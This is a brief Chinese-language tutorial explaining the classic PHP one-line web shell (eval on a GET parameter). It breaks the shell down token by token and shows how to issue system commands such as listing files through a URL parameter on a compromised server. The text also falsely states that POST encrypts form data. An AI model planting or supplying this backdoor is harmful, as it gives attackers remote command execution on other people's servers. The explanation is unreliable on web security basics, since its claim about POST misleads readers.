一句话木马
<?php @eval($_GET[cmd]);?>
<?php
php文件头
?>
@
屏蔽错误
如果加上就是不显示错误信息
不然就会显示
Warning:.....
Warning:.....
Warning:.....
eval
这是一个函数它会把后面括号的代码当做php代码运行。
这是一个危险函数,一般网站会把它过滤屏蔽。
$
这是一个变量源名
GET
获取表单
POST
也是获取表单,不过它会进行加密。使别人无法看到。
cmd
一个参数,到时候连接时用的,可改。
有些情况下会用''
一般来说都是因为存在空格
<?php @eval($_GET[cmd]);?>
总体的意思就是把()内的代码作为php代码执行,获取有关cmd参数的表单
连接一句话木马
xx.php?cmd=system(ls);
cmd参数就是[]里面的,可自定义
system一个系统函数执行系统命令